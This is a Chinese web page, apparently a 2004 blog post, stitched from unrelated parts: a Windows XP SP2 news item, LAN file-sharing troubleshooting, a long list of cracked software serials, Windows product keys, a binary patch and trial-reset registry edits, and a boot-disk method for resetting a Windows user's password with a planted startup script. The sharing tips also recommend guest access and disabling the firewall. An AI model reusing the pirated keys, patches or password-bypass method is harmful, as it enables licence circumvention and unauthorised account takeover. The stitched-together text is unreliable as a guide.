通过对操作系统代码和配置的改变,Windows XP SP2旨在提高Windows XP操作系统在处理网络数据、软件内存、浏览活动和电子邮件时的安全性能。除了使软件通过自动升级之外,微软公司将允许信息技术管理人员下载一个企业用于升级它们的机器的软件。至于Windows XP操作系统本身的漏洞,迈弗雷特表示,升级是为了通过增添更多新的保护功能和更好的配置,使Windows XP操作系统的安全性能得到了更大的提高,而不是为了发现所有的安全漏洞。他表示,微软公司从来都没有承诺过SP2能够关闭Windows XP操作系统中所有的漏洞。

在局域网内安装了Windows XP的电脑不能与安装了Windows 98的电脑互相访问,安装了Windows XP
的电脑与安装了Windows XP的电脑也不能互相通信。在工作站访问服务器时,工作站的“网上邻居”中可
以看到服务器的名称,但是点击后却无法看到任何共享内容,或者提示找不到网络径、无权访问等问题,
归纳为以下几点:
    在XP首次使用的时候要在网上邻居的属性里面新建一个网络连接进行网络安装向导。
  1、检查计算机之间的物理连接。
  网卡是网络连接的基本设备,在桌面计算机中,每个网卡后面的指示灯应该是亮的,这表示连接是
正常的。如果不亮,请检查集线器或交换机是打开的,而且每个客户端连接的指示灯都是亮的,这表示
链接是正常的。接下来检查网线的水晶头是否接触良好。
  2、确保所有计算机上都安装了TCP/IP,并且工作正常。
  在Windows XP中默认安装了TCP/IP。但是,如果出了网络问题想卸载后重新安装TCP/IP就不容易
了:在“本地连接”属性中显示的此连接使用下列项目列表中单击Internet协议(TCP/IP)项,您将发现卸载
按钮不可用(被禁用)。
  这是因为传输控制协议/Internet协议(TCP/IP)堆栈是Microsoft XP/ 2003的核心组件,不能删除。在
这种情况下,如果需要重新安装TCP/IP以使TCP/IP堆栈恢复为原始状态。可以使用NetShell实用程序重
置TCP/IP堆栈,使其恢复到初次安装操作系统时的状态。方法是:在命令提示符后键入以下命令,然后
按ENTER键:netsh int ip reset c:\resetlog.txt,其中,Resetlog.txt记录命令结果的日志文件,一定要指
定,这里指定了Resetlog.txt日志文件及完整路径。运行此命令的结果与删除并重新安装TCP/IP协议的效
果相同。
  3、使用ping命令测试网络中两台计算机之间的连接:


  ping其它计算机IP,在命令提示处,键入ping x.x.x.x(其中x.x.x.x是另一台计算机的IP地址),然后
按ENTER键。应该可以看到来自另一台计算机的几个答复,如:
  Reply from x.x.x.x:bytes=32 time<1ms TTL=128
  如果没有看到这些答复,或者看到”Request timed out”,说明本地计算机可能有问题。如果ping命
令成功执行,那么您就确定了计算机可以正确连接,可以跳过下一步。如果没有看到这些答复,或者看
到”Request timed out”,说明本地计算机可能有问题。PING本地IP,如果看到”Request timed out”,说
明本地计算机可能有问题。
  4、使用ping命令测试网络中名称解析是否正常
  ping computername,其中computername是远程计算机的名称。通过ping命令用名称测试计算机连
接。确定计算机的名称的方法是:在命令提示处,输入SYSTEMINFO。或者在桌面上右击我的电脑-属性
,然后单击计算机名称选项卡。如果看到该命令的成功答复,说明您在计算机之间具有基本连接和名称
解析。名称解析跟NETBIOS密切相关,看下面的步骤。
    5、正确安装网络组件


  首先右击网上邻居-属性,选择要共享的网卡。把IP设置在局域网的同一个网段上。比如
192.168.1.X网段。然后看一下TCP/IP的高级属性中,是否开启NETBIOS。
    在利用WINNT4.0构建的网络系统中,对每一台主机的唯一标识信息是它的NetBIOS名,系统是利用
WINS服务、信息广播方式及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。
    在内部网络系统中(也就是通常我们所说的局域网中),利用NetBIOS名实现信息通讯是非常方便、快
捷的。但是在Internet上对一台主机的唯一标识信息是它的FQDN格式的域名(www.163.com),在
Internet是利用DNS标准来实现将域名解析为相应IP地址,WIN2K支持动态DNS,运行活动目录服务的机
器可动态地更新DNS表。
    WIN2K网络中可以不再需要WINS服务,但是WIN2K仍然支持WINS,这是由于向后兼容的原因。目前
,大多数网络是混合网,既有Win98等系统,又有WINXP/WIN2K等系统,因此需要在TCP/IP协议上捆绑
NETBIOS解析计算机名。
  查看是否选定“文件和打印服务”组件,如果已将其取消选中,“浏览服务”将不绑定到NetBIOS接口。
成为备份浏览器并且没有启用“文件和打印共享”的基于Windows的计算机无法将浏览列表与客户机共享
。任何将要包括在浏览列表中的计算机也都必须启用“文件和打印共享”。


以下转自电脑爱好者俱乐部
问局域网内winXP的访问问题,现将个人的一点经验总结如下:
  一、启用guest来宾帐户;
    二、控制面板→管理工具→本地安全策略→本地策略→用户权利指派里,“从网络访问此计算机”中加入guest帐户,而“拒绝从网络访问这台计算机”中删除guest帐户;


    三、我的电脑→工具→文件夹选项→查看→去掉“使用简单文件共享(推荐)”前的勾;


    四、设置共享文件夹;
    五、控制面板→管理工具→本地安全策略→本地策略→安全选项里,把“网络访问:本地帐户的共享和安全模式”设为“仅来宾-本地用户以来宾的身份验证”(可选,此项设置可去除访问时要求输入密码的对话框,也可视情况设为“经典-本地用户以自己的身份验证”);


    六、右击“我的电脑”→“属性”→“计算机名”,该选项卡中有没有出现你的局域网工作组名称,如“work”等。然后单击“网络 ID”按钮,开始“网络标识向导”:单击“下一步”,选择“本机是商业网络的一部分,用它连接到其他工作着的计算机”;单击“下一步”,选择“公司使用没有域的网络”;单击“下一步”按钮,然后输入你的局域网的工作组名,如“work”,再次单击“下一步”按钮,最后单击“完成”按钮完成设置。



    一般经过以上步骤,基本可以解决。如果不行,再往下看:


  七、检查本地连接是否被禁用,右击“本地连接”→“启用”;
  八、关闭网络防火墙;
  九、检查是否启用了域,是否加入了该域并检查域设置;
  十、检查是否关闭了server服务;


 


十一、检查本地连接IP、子网掩码、网关及DNS设置是否有误;


十二、“本地连接”→属性→常规,检查是否安装了“Microsoft网络文件和打印机共享”、“Microsoft网络客户端”以及TCP/IP协议;
十三、某些局域网游戏和软件须安装NetBEUI协议。而且网上有文章说,在小型局域网中,微软在WinXP中只支持的TCP/IP协议和NWLink IPX/SPX/NetBIOS兼容协议表现不尽如人意,在小型局域网(拥有200台左右电脑的网络)中NetBEUI是占用内存最少、速度最快的一种协议。
    安装方法:
    ①放入Windows XP安装光盘,到“valueaddMsft et etbeui”目录下将Netnbf.inf复制C:\Windows\INF中;
    ②将Nbf.sys复制到C:\Windows\System32\Drivers中;
    ③开始→控制面板→网上邻居”→“网络连接”→“本地连接”(就是你目前使用中的局域网连接)上按右键→“属性”→“常规”→“安装”→“通讯协议”→→“添加”,此时就可以看到“NetBEUI Protocol”这一项(此项原来是没有的),选取NetBEUI之后,按确定就OK了。


  十四、作为网络浏览服务器的电脑由于病毒、配置低运行慢以及死机等原因导致网络上的计算机列表得不到更新,使得某些机器有时候在网上邻居中找不到。
  解决办法:最简单的办法是重启各种网络设备和电脑,或者关闭个别有上述问题的电脑上的网络浏览服务器功能,方法如下:
    win2000/XP下禁用Computer Browser服务
十五、给系统打上补丁。WinXP访问网上邻居的速度较慢,这是WinXP的一个Bug,当我们打开网上邻居时,操作系统首先会从计划任务中进行查找,因此就大大影响了访问的速度,除非您已经安装了SP1补丁才不会存在这个问题。
     可以手工解决这一问题。从注册表中找到“\HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace”,这里有一个名为“{D6277990-4C6A-11CF-8D87-00AA0060F5BF}”的子键,该子键指向“计划任务(Scheduled Tasks)”,将它直接删除即可。


     十六、先卸载网卡驱动,重启再重装;


  十七、硬件问题,检查网卡、网线、集线器、路由器等,在检查之前,最好先重启一下网络设备(集线器、交换机、路由器)看能否解决;


  十八、病毒(木马)原因。升级病毒库安全模式下全盘杀毒。

2004年10月19日

TurboFTP 2.72(GB)--Name: TEAM LAXiTY s/n: 48-HZ154ZD-792
TransMac 4.2--Name:Free User Code:K7E7PAAM6SF2 
Trojan Remover 4.3.0--number:22222 key:875873717
Trojan Remover 4.3.0--Number:189891 Key:46339488573227112
Trojan Remover 4.2.2--SN: 12345678 / 376003664581841
Trojan Remover 4.1.7--Name:[eGIS! ‘98] Company:UCF/PCE ‘98 Code:3743079544
TuneSpark.CD.Maker.v1.1.214--Name:stcsr SN:870648E6044E75E3
Tweaki for Power Users 3.0.12--sn:YOQNPGTW
TxEdit 4.7--Name:LwAkUsChI Org:cOoL Code:4015466477
Type manager--sn:AWW400P0101591-292
听网 1.0--SN:41EF-2645-04560647
天网防火墙 v2.0.3.102-v2.3通用--用户名:evrybody 注册号:582f 或者注册名:microke 注册码:3d8f
天音怒放 V2.15--用户名:fpxfpx 注册码:505-0853-45
天音怒放 V2.14--Name:www.dyiyd.com SN:443-7672-13
天音怒放 V2.13b--Name:www.dyiyd.com SN:443-7672-13
天音怒放 V2.13--注册名:世纪动力 注册码:999-1962-28 或者 注册名:师大附中 注册码:974-8525-71 或者 注册名:RIRI 注册码:632-0390-88
天音怒放2.1修正版--用户名:www.crackbest.com密码:685-4091-45

 

Ultra Edit V8.00b--Name:Free User Code:S7N0N-PDE7V-M7Z2I-C1P0R 
Ulead Photo Express(我形我速) 4.0 Trial-sn:12903-54000-87045955
Ulead Photo Explorer Pro 7.0 iso--sn:11103-67000-00262910
Ulead PhotoImpact V6.0 ESD--sn:11103-06000-00085757
Ulead VideoStudio 5.0正式版--SN:11102-85000-00015330
Ulead COOL 3D 3.0 简体中文正式版--SN:12905-03000-00381553

 

Virtual Drive(虚拟光驱) 2001 个人版--安装序列号:FSX31000000
VRV北信源杀毒专家2001 正式零售版--序列号:FJDLKICPEAE
VoptMe 6.20--Name:0000000000 Location:0000000000 Personal Key:CE9391A5GCOBR6F00000或者Name:w Location:[CCG] Code:C7D6623C37O2R16WSMKS
VisualRoute 5.2c--CLIENT KEY: VISUALROUTE-PWV5C1-5A3245-4A61 SERVER KEY: VISUALROUTE-PWV5S10-FBA833-95E4
VuePrint Pro 7.7b--Code:11168520

 

文件密使 2.3 注册--用户名:fpx.yeah.net 注册码:4131484501
网络小吸星 v1.0--用户名:www.crackbest.com 密码:N89HN4WN3J或者用户名:gfh 注册码:8QT3QT3QZO
网络搜索软件HostSeek1.1中文版 用户名fpx[CCG] 注册码6BA0-1380-5B03-3801
五子棋大战 v2.16.127 注册码:g216lab031b5xup376
五子棋大战--注册码: g216lab031b5xup376
我的保险箱--用户名:gfh 邮箱:sxcgfh@sina.com 注册码:346356413166221
我形我素 4.0--sn:12903-54000-87045955
WPS Office 金山办公组合(企业版)--SN:KSW026-110000-428123-807600
Wps2000序列号--KSW00-13328-76201 或者 KSW00-42712-80739
WPS2000万能序列号--KSW00-00000-00000
WinISO 4.0.0.103 注册码--Name:fixdown Code:9988c3cad629cd2d0000006b00000000
WinISO V3.9.0.100正式版注册码--user:winiso sn: 998814fe1ad423ec0000005f00000000或者Name:Free User Code:9988be39150d1ffa0000006d00000000
WinISO 3.X通用注册码–Name:Free User Code:9988be39150d1ffa0000006d00000000
Winmsg 消息精灵3.13 v3.13.3649--用户名:白菜乐园 注册码:58-F0-89-58-06-53-53-2A
Winmsg 消息精灵3.00 v3.12.3472--注册名:www.dyiyd.com 注册码:09-2B-79-43-B5-1E-24-0C
WinImage V5.00.5009 Beta--Name:CrazyKnight [ORiON] CN:E3744D08或者Name:The Netmech^LasH Regcode: 44C66A34
WinImage V5.00.5007--Name:John Hunt sn:122CA601
Windows Power Tools 3.15--Code:B8X687-ND98Y-NDKG6-PMVH8
Windows Power Tools 2.85--Code:b87d789wnfijwefh87eyf87h
Windows进程管理(Process Manager) v3.0.1--注册名:Nicsoft 注册码:11064 或者 name:sunfeng SN:EG12376
Windows进程管理(Process Manager) v3.0--name:dyiyd [CCG] code:CCG15688
Wild type--sn:FHW251R31003373
WinImp 1.21--Name:IMP Key1:3E8FC381 Key2:6884663C
WinZip 8.1 beta Build 4180--Name:x SN:00020000或者Name:cTRLd SN:1D4C036C
Winzip v8.0 build3105--注册名:among 注册码:514A0431 或者 注册名:wang qiang 注册码:c97b0c33 或者 注册名:ldr 注册码:77940148或者name:wangds code:529c0641
WinZip v7.0 SR-1--注册码:Name:The Krazy Nomad [DEViANT] sn:0BB3629F
WinDVD v2.3 DTS ISO--sn:4432GHT7C7R84E0
万能五笔2000+通用注册码--用户名:shenwei168 PASSWORD: 2546781324578124(可以是十六个任意数字)
万能五笔注册码--用户名:cniti 用户码:3821-076433-0764 
WebZip 4.1.0.657--Name:among s/n:1981862877 Key:A7BB94087900
WebZip 4.1.0.654--Name:among s/n:1981862877 Key:A7BB94087900
WebZip 4.10 Build 624--Name:among Seria Numberl:1981862877 Reg Key:A7BB94087900
WebZip 4.00版本通用注册码--name:among Seria Numberl:1981862877 Reg Key:A7BB94087900 或者 name:1key serial:love1key code:6ED1140C1600 或者 姓名:sNoOFy [AmoK] 序列号:nICE tO sEE yOU! ;-) 注册码:A8EF3C7C1A00
WinGate 4.4.0(0728)--Name:oDDiTy PHEAR Code:666CA61E5DDB490FE6D07C12
Wingate Pro v4.40--name: oDDiTy PHEAR key: 666CA61E5DDB490FE6D07C12 或者name: ODDITY BASTARD key: CA160578A130655A442D34F9
WinGate 4.4 Beta A--用户名: MFD Corp. 注册码:36BF3E69EEAEE1E83E36132E或者Name:oDDiTy PHEAR s/n:666CA61E008F4E0F86D07C12
WinGate vx.x--Name: United Cracking Force – QT sn:419764B050C2EF1DD21CAB12
WinGate v4.3--Name:Boy SN:AE5F56E5D95781E99FCEA546 或者 Name: DFA OWNZ SN:666CA61E008F4E0F86D07C12
WinGate V4.2--Name:MFD Corp.sn:36BF3E69EEAEE1E83E36132E 
WinRescue 98 5.04--注册:Code:SvetCHRISTA
WinRescue 95 V10.04--注册:msR3I8aUi9y2E84L
WinRescue Me 1.04--注册:Code:myONEthing
WinRescue 2000 2.04--注册:Code:NashBOGvseMogyshee
WinRescue NT V2.04--Code:IBNTB-IMN4KJO
WinRescue 98 V5.03--Code:SvetCHRISTA
WinRescue 95 V10.03--Code:msR3I8aUi9y2E84L
WinRescue Me 1.03--Code:myONEthing
WinRescue 2K V2.03--Code:NashBOGvseMogyshee
WinRescue NT V2.03--Code:IBNTB-IMN4KJO
WindowsXP可以无限次激活的号码:CXGDD-GP2B2-RKWWD-HG3HY-VDJ7J或者RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
WindowsXP 2520 Pro 英文版--60天免激活序列号:RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
Windows XP 2505 RC1--序列号:DTWB2-VX8WY-FG8R3-X696T-66Y46 Q3R8Y-MP9KD-3M6KB-383YB-7PK9Q 411Y0-URB45-34R3B-310N6-70U51 F0R6R-347JU-57IC3-M0V34-11Z16 50M38-0DY53-7UPU5-7H380-M8111
WindowXP(windows whistler) Beta2 build 2428--CD Key: RBDC9-VTRC8-D7972-J97JY-PRVMG
Windows Mellinium(Windows Me)简体中文最终正式版--s/n: B6BYC-6T7C3-4PXRW-2XKWB-GYV33
Windows2000 Professional 中文版--SN:PQHKR-G4JFW-VTY3P-G4WQ2-88CTW
Windows2000 Professional英文正式版--s/n: RBDC9-VTRC8-D7972-J97JY-PRVMG
Windows2000 Server 简体中文完全正式版--S/N:XF7DK-7X2WM-2QRCT-Y9R23-4BHDG
Windows2000 Server--CD-KEY:H6TWQ-TQQM8-HXJYG-D69F7-R84VM
Windows 98 SE 标准正式版--s/n: HMTWJ-VPPWP-9BXP8-WD73Y-GGT6M
Windows98序列号--K4HVD-Q9TJ9-6CRX9-C9G68-RQ2D3

 

熊猫钛金零售版Panda Antivirus Titanium--name:U38V92LK3H password:2a16sd7xekx79
熊猫卫士白金版Panda Antivirus Platinum--注册号:4nzdcdpb6j5
熊猫卫士白金版Panda Antivirus Platinum 6.30--Code:4nzdcdpb6j5
虚拟光驱(Virtual Drive) 2001 个人版--安装序列号:FSX31000000
现在就打字1.2注册号-- 姓名:www.crackbest.com 密码:105277772612
下载软件管理盒(FlashSoft) V1.06--用户名:www.crackbest.com 注册码:873359396 
写作投稿宝典 WriteBook v2.0 用户名:www.cracknow.com 注册码:ugxbcCzfreuvcXvf
讯连科技影音捕手Ⅱ PowerVCR 2.0 Deluxe 豪华中文正式版 S/N:OD064L33J39M5164
讯连科技影音播霸 PowerPlayer S/N:CW09864954327370
讯连科技魅力四射 Medi@Show 2.0 中文正式版 S/N:PM694846889M8913
虚拟光盘2000 S/N:A5X68013090
虚拟光盘2000 V5.1中文正式版 S/N:A6X89011246
虚拟光盘2000 V6.1中文正式版 S/N:FSX31000000
虚拟光盘2000 中/英/日文 网络完整破解专业版 S/N:F5X320000001009
虚拟光盘2中文专业版 S/N:FNX88001104
虚拟光盘3Virtual Drive 3.00 S/N:F3X07010020
虚拟还原 2000 V1.1 个人版创新的实时还原系统 S/N:n6×48085001001

 

鹦鹉螺网络助手(Nautilus NetKit)v2.20中文版--Name:husoft Code:rkdwpibung 或者 Name:nicsoft code:mfyrkdwpib
鹦鹉螺网络助手(Nautilus NetKit)v2.11中文版--注册名:dyiyd [CCG] 注册码exqjcvohat
友情强档 5.82.0999(08.01)--Name:getfox SN:172392-EIVJYH
友情强档5.82.999国际版--Name:getfox SN:172392-EIVJYH
友情强档5.80.978国际版--Name:getfox SN:172392-EIVJYH
友情强档 V5.63国际版--Name:wind[CCG] SN:196350-XIEVVQVIR
友情强档6.0注册码 姓名:guodong 注册码:191094-VEVXLLL
应收应付款管理 V1.0 注册码 注册码:80241029
音域 98 V1.6-中文正式版 for 95/98/NT S/N:itdxcloyfh
音域 99 音乐骇客 S/N:G10100864-606
恒特画王 在 dnhx.exe 中找 385df37405 改为 385df37505
倚天 2000 for WIN95 S/N:62256346
倚天 ET V5.0 for Windows S/N:62256346
倚天 ETEN 2000 中文系统 S/N:33333333
倚天中文 2000 V5.22 S/N:62256346
倚天非常好色 S/N:21173350 or S/N:62256346 or S/N:33333333
音画时尚(ICE Player) v2.6--注册码:PL68A-yhss-style-98566-55860或者6615-FCJX-LDgs-155868-ice260a
音画时尚(ICE Player) v2.18--注册码:TD98c-00ip-Q65Z-4129C-8521 或者 fyal-WMCZ-LDco-slyy-ice218
音乐贝贝(CDOK)--姓名:洋白菜 公司:www.crackbest.com Email:yang119@crackbest.com sn:CA9C8419 或者注册名:copyyour 公司:CCG 信箱:cncrack@963.net 注册码:7E868430

Z

桌面放大镜注册码--用户名:gfh 注册码:i26hZ73e
找别扭 v4.0 Name:xiaolou SN:33225T2o5DvzvLH
中文版拼图游戏1.0--注册码:ffrjj_196418
中华压缩(ChinaZip) 6.02--用户名:www.crackbest.com 注册码:AKEM9752
自然画笔(Painter) 6.0--SN:PF60WRZ-0015375-WRB
智能陈桥五笔5.03正式版--注册信息码:CCJXQ7X5S
智能狂拼II正式版--序列号:350-00161634365653
智能狂拼完全正式版--sn:300-812522036449
中文之星 2001--SN:310-121964037443

→CD Box Labeler Pro 1.6.1.851 用户名:CrackerABC[BCG] 注册码:GPS-430426-703238
→Bullet Proof FTP v2.3 下载注册机(算了一个注册码,好象无法使用,试试EGIS的注册机)
→一拖即存3.6 注册码:ST-0791-8E3T01187-CCD
→Tweak Me 1.2.2 s/n: 1-Z545136128-1128382-433
→Real格式文件压缩至尊 v1.40 TianYusoftware is good
→Exe Protect 1.0 Name: CrackerABC[BCG] Code:$C34892C2
→现在就打字 用户名:现在就打字 注册码:175652125032
→EmEditor 3.14 SN:1710-6480-9217-5957 原版下载
→Net Optimizer v3.0 sn:28031979-ph-17081945 原版下载
→Irfan View32 v3.35 Name:1key.126.com sn:467886008
→Snag-It v5.20 Name:1key.126.com company:1key sn:CC73D1DBCD4D5924
→VisualRoute 5.2c SN:F92C46F0-V5P87-71C71CE9-DE6 原版下载
→GoldWave 4.24 Name:FREESOFT Last Name:FREESOFT Code:GELUUWB 原版下载
→伏羲服装鞋业购销存注册码 (3.01版本)用户名:CrackerABC[BCG]
注册码:67206-51065-65042-60186-30376
(3.01版本)用户名:CrackerABC[BCG]
注册码:56238-53314-54999-64919-50083
(3.01版本)用户名:CrackerABC[BCG]
注册码:73071-41361-63517-43840-46932
→Windows Power Tools 2.85 Code:b87d789wnfijwefh87eyf87h 原版下载
→MP3 Converter v2.17 Name:1key.126.com sn:5573200811567025574
→Snappy Fax 2000 V2.11.5.1 Name:Free User Code:8B4D0AF5CFC821E413
→AltoMP3 Maker 2.2 Name:Free User SN:1LfDE2UKh1F5i9fC 原版下载
→Eudora Pro 5.1 First Name:Free Last Name:User Code:49389945-64998697 原版下载
→ReadBook 1.43增强版 Name:1key.126.com sn:2531612613
→Winmsg 消息精灵 v3.0 注册名:www.dyiyd.com
注册码:09-2B-79-43-B5-1E-24-0C
→GetRight v4.5 Beta 4 SN:941829970387
→MusicMatch Jukebox 6.00.4044a SN:WRJWH-9394G-7W7QH-A2G7R
→Private Pix 2.11 name: 1key.126.com code: d32B3r134r335 或
name: copyyour code: 097ACDA020
→听网 1.0 序列号:41EF-2645-04560647
→Opera 5.10 Code:w-EeiCL-QyJFS-3mYfc-rFzFh-NMFWk
→Windows 进程管理大师 v3.0.1 Name: 中华破解联盟 sn:á37888
→登陆奇兵 v3.01测试版 Name:FanWaiDi Code:PI346RNY542Y
→软件管理专家 (flashsoft) 注册名:dyiyd [CCG] 注册码:1639517796 原版下载
→RegRun II v2.91 Name:1key email:caozcool@21cn.com sn:1017479
→Real 格式文件压缩至尊V1.3 注册码:TianYusoftware is good
→RegRun II 2.91 Name:1key email:caozcool@21cn.com sn:253271
→windows优化大师通用注册码 注册机码下载
→CuteFtp通用注册文件 Name:1key.126.com custom:1key sn:AY6RP7E6V9DX37
→OICQ 图形留言系统 v3.5 注册名:dyiyd [CCG] 注册码:1538053898
→Fast Browser v3.3 PRO serial:fb0027614094 code:636638490477400385336255
→ftpNetDrive v4.10 sn:04-050-095-28764
→开心斗地主1.5(S9) Name:飞碟网络 SN:http://ufocn.coc.cc 软件下载
→欧阳网络客户管家 v2.0注册码 注册码:4080340240803402
→WinDVD2000 v2.4 OEM国际版 sn: NJZB3VEIWTK6RGT
→轻松试卷单机版 v4.04 用户名:NicSoft
注册码:OUUEQ-NQQWCOTK
→财务专家2001注册码 SN:NDOE77OEKTP
→魔装网神2001 v2.6 Name:CHINA S/n:166B031
→Panda Antivirus Platinum 6.23 (熊猫卫士) Code:4nzdcdpb6j5 完全版下载
→开心斗地主1.5(S6) Name:测试用户 SN:AL5078BYCT
→CuteFTP V4.2.3 注册文件下载
→OICQ图形留言系统3.20 Name:1key Code:50466173

补充2

冒险弹子球~遗忘之岛-Adventure Pinball Forgotten Island-(冒险)-英文版
S/N:0901-3066676-3327010-9227
勇者斗恶魔 S/N:14000068
劲爆美式足球 2001 Madden NFL 2001 S/N:1500 6610360 1643530 0243
劲爆美国职篮2001 EA Sport NBA Live 2001 (破解版) S/N:2001-0020601-0010978-6694
拼音王95
找\HKEY_LOCAL_MACHINE\SOFTWARE\OAC\WINDOWS\CURRENTVERSION\TRIAL\
删去trial下所有键值
星海争霸 S/N:2578-73218-1056 or 3131-85031-0738 or 3835-00010-6423
星舰迷航记:星舰指挥官2~帝国战争 Star Trek Starfleet Command
2【3片装】S/N:RYS8-LAB4-JEF8-BYM3-4652
星舰迷航记~帝国霸业-STAR TREK CONQUEST ONLINE-(策略)英文版-国内上市版
S/N:2E10BCNHII86UP5V
活祭 scarifice【国内正式上市版可Patch更新】S/N:1234-1234-1234-1234
相思树读信软件 Name:seednetekt S/N:34817647
美国职棒大联盟 2002 Triple Play Bassball 2002
S/N:0204-3939889-8825252-2002
美国职棒大联盟 2002-Triple play 2002【运动】英文版-国内上市版
S/N:2500-7240579-3830751-5535
美萍安全卫士菜单 S/N:smartguoyan
致命一击 The Typing of the Dead S/N:TDK0200-176403-17407
个人计算机图书馆 V1.10 Name:mENTALs 地区:mSoft S/N:IYfjyg^z=`@pbK
家庭会计?#0124;方家庭会计总帐 S/N:F50-86126440-301
捍卫长空 TACHYON S/N:2UZW-Z4GT-NMVE-FJAR-SQS5
格斗天王99进化版 THE KING OF FIGHTERS ‘99 EVOLUTION 日文版 执行WIN
9X目录中的Regedit.EXE
,而后编辑HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
将默认值改成 00000411
泰伯伦之日 S/N:999999-999999-999999-4190
泰坦号潜水艇 S/N:GAYMADBOY-7TEH
纯爱手纸 S/N:H18-41-00119
讯连科技 LinkTel`立可通视讯电话系统`中文版 S/N:LT97864992966461
讯连科技影音捕手 PowerVCR V1.3 DELUXE 中/英/日 多国语言豪华版
S/N:PD49731X83G47248
配乐执照正式版【两片装】S/N:101465508
除错大师中文校对系统 S/N:2g94GJ21ZB120d
斗地主 V1.0 Name:文岭 E-Mail:opq98@263.net S/N:7T7011Q1MBKN18KK
Name:中国 E-Mail:lhzg@263.net S/N:1CR6-ESE4-52EA-1EK4
动态字酷~网页文字EASY DO S/N:ANM-22A100114-318
推箱子 V1.54 Name:fjg S/N:596925 or Name:china S/N:bUNA@3
救世传说 NOX【2片装】S/N:017934-718048-114782-5775
救世传说 S/N:018257-215962-526997-5083
终极动员令2 泰伯伦之日 S/N:999999-999999-999999-4190
终极动员令之红色警戒 2 中文版 C & C Red Alert 2
S/N:023188-948194-364765-6631
终极猎杀 Ultimate HUNT Challenge S/N:14067 CHOW VATS SLAP CLAY
莎士比亚 V4.02 中英文桌上排版 for win95 S/N:90700279
莎士比亚 V6.0 中/英文排版系统 for Win95/98/WinNT S/N:E15-40-00640
软件包装大师 InstallShield 最新 2001 专业版 Password:ChamberOf32Doors
serial:IDPRF8-0620-5000776954
软件护照2.10版 S/N:2287222
通用数据管理器Mybase V2.0 Name:opq98 S/N:2Y25-MBS-Q27T5RXC
钓道4 Field & Stream Trophy Bass 4【钓鱼仿真】
S/N:NUB9-WUB8-ZUC7-RAJ3-3976
章鱼助理 V3.2 S/N:VS14988390 S/N:7878787878787878
麻将铁公鸡-网络代码 S/N:L995SMJF
报刊电子版更新系统 V1.0 Name:mssoft 地址:chinese
S/N:V10-61936089528866478571
报刊电子版更新系统 V1.1 Name:yEToO 地址:SZXT S/N:V10-35180601012541914860
报刊杂志电子版更新系统 V1.0 Name:IceWorld 地址:冰天雪地
S/N:V10-46743005477121325771
几何画王 V2.0 S/N:26474-32326-95735-36476-19774
扬志显示集成控制系统 V3.4.0003 S/N:constant
晴窗中文大侠 2000 II代(试用版)
软件只能试用99次,试用次数标记在HKEY_LOCAL_MACHINE\Software\Microsoft\code
view.可以用删除或者导出注册表分支然后运行的方法
湍溪?#0124;钓大赛4 S/N:NUB9-WUB8-ZUC7-RAJ3-3976
绝对武力 (Counter-Strike) S/N:0307-53665-6167 or
S/N:2249-23667-2165
紫微斗数命理专业版 S/N:readme
紫微论断 Name:GEric Tsai 身分字号:GA123456789 注册码:GRUPWI12514
专业版密码:GSTIZD29223
善与恶-Black & White-(角色扮演)-英文版-完整破解版
S/N:0901-3324366-4702210-2081
善与恶-中文版 BLACK & WHITE S/N:0901-3324366-4702210-2081
华康亚洲通 S/N:5162345-34

  
 

Windows XP启动脚本(startup scripts)是计算机在登录屏幕出现之前运行的批处理文件,它的功能类似于Windows 9×和DOS中的自动执行批处理文件autoexec.bat。利用这个特性,可以编写一个批处理文件重新设置用户密码,并将它加入启动脚本中,这样就达到了目的。以下是具体步骤(假设系统目录为C:\Windows)。

    1.使用Windows98启动盘启动电脑。编写一个能恢复密码的批处理文件a.bat,内容只需要一条“net user”命令即可:“Net user rwd 12345678”。这条命令的意思是将用户rwd的密码设置为“12345678”(有关Net命令的用法,可参考Windows帮助)。然后将文件a.bat保存到“C:\windows\system32\GroupPolicy\Machine\Scripts\Startup”下。

    2.编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:

  [Startup]
  0CmdLine=a.bat
  0Parameters=

    3.将文件scripts.ini保存到“C:\winnt\system32\GroupPolicy\Machine\Scripts”下。scripts.ini保存着计算机启动/关机脚本的设置数据,文件内容通常包含两个数据段:[Startup]和[Shutdown]。[Startup]数据段下是启动脚本配置,[Shutdown]数据段下是关机脚本配置。每个脚本条目被分成脚本名和脚本参数两部分存储,脚本名保存在XCmdLine关键字下,参数保存在XParameters关键字下,这里的X表示从0开始的脚本序号,以区别多个脚本条目和标志各脚本条目的运行顺序。

    4.取出Windows 98启动盘,重新启动电脑,等待启动脚本运行。启动脚本运行结束后用户rwd的密码就被恢复为“12345678”。

    5.登录成功后删除上述步骤建立的两个文件。

    说明:电脑使用的是FAT32文件系统